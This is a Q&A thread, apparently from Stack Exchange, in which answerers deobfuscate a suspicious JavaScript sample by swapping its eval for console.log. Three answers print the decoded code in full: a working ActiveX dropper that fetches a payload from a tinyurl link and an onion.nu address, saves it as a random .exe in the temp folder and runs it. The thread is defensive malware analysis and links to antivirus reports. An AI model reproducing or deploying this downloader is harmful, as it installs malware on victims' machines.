How to deobfuscate suspicious JavaScript code?

The procedure for dealing with obfuscated JavaScript is very similar to how you deal with it in PHP. In this case, the real action is going on in this line:

uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}"+tljsw()+tljsw()+tljsw()+tljsw()+"(tgrdm);")(abisr));

An anonymous function is created from the long string of code, and that function in turn creates new code by picking characters from the long banks of seemingly random text at the top. At the end you have four function calls:

tljsw()+tljsw()+tljsw()+tljsw()

That function at random returns one of the letters e, v, l and a. So sometimes it will give you eval. That executes code, but we don't want to do that. We just want to read the code. So let's replace it with console.log:

uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}cconsole.log(tgrdm);")(abisr));

We then get the following output:

function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

function getData(callback) {
    try {
        getDataFromUrl("http://tiny" + "url.com/he3bh27", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http://oamnohndpiwpicgm.onion.nu/10.mov", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("http://tiny" + "url.com/he3bh27", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {}
            }
        });
    }
});

I don't know what that code does, but the second I copy pasted it into a text editor my antivirus started screaming about it... As LegionMammal978 points out in comments this seems to target IE browsers with bad config, but to be on the safe side you could assume that the computer this was run on is infected by malware and treat it as such.

(Note that I had to split the URLs into "tiny" + "url" because Stack Exchange does not let you post that URL... This should not change the behaviour of the code, though.)


This code is trying to execute a malicious file, 10.mov (against IE ActiveX), which is possibly some kind of ransomware, downloading from this address:

DON'T DOWNLOAD FROM THIS ADDRESS!

xxxx://oamnohndpiwpicgm.onion.nu/10.mov  

https://virustotal.com/en/url/f6aaa537b8f636b7827e08806bf6a8512b5c6497b82e457615cec15a62e2f044/analysis/

Here is de-obfuscated code:

function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
function getData(callback) {
    try {
        getDataFromUrl("", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http://oamnohndpiwpicgm.onion.nu/10.mov", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}
function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}
function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {}
            }
        });
    }
});

Here is a report from VT of that file (Fordanskede.exe):

https://www.virustotal.com/en/file/8991ce3e98dd732dafedd22723c51212278717e6d9583244bda5d1d178ba08d0/analysis/1484576109/

Another report when file is triggered in sandbox:

https://www.hybrid-analysis.com/sample/8991ce3e98dd732dafedd22723c51212278717e6d9583244bda5d1d178ba08d0?environmentId=100


There's the "encrypted part" of the code:

BE CAREFUL THIS IS AN ACTUAL EXPLOIT CODE AND CAN BE HARMFUL TO YOUR COMPUTER

function getDataFromUrl(url, callback){try{var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");xmlHttp.open("GET", url, false);xmlHttp.send();if (xmlHttp.status == 200) {return callback(xmlHttp.ResponseBody, false);}else{return callback(null, true);}}catch (error){return callback(null, true);}}function getData(callback){try{getDataFromUrl("http://oamnohndpiwpicgm.onion."nu/10.mov", function(result, error) {if (!error){return callback(result, false);}else{getDataFromUrl("http://oamnohndpiwpicgm.onion."nu/10.mov", function(result, error) {if (!error){return callback(result, false);}else{getDataFromUrl("http://oamnohndpiwpicgm.onion."nu/10.mov", function(result, error) {if (!error){return callback(result, false);}else{return callback(null, true);}});}});}});}catch (error){return callback(null, true);}}function getTempFilePath(){try{var fs = new ActiveXObject("Scripting.FileSystemObject");var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;return tmpFilePath;}catch (error){return false;}}function saveToTemp(data, callback){try{var path = getTempFilePath();if (path){var objStream = new ActiveXObject("ADODB.Stream");objStream.Open();objStream.Type = 1;objStream.Write(data);objStream.Position = 0;objStream.SaveToFile(path, 2);objStream.Close();return callback(path, false);}else {return callback(null, true);}}catch (error){return callback(null, true);}}getData(function (data, error) {if (!error){saveToTemp(data, function (path, error) {if (!error){try{var wsh = new ActiveXObject("WScript.Shell");wsh.Run(path);}catch (error) {}}});}});

This will download an infected .mov file, which is detected by any good antivirus.

Edit: Since it used the TinyURL service, I have contacted them to delete the link.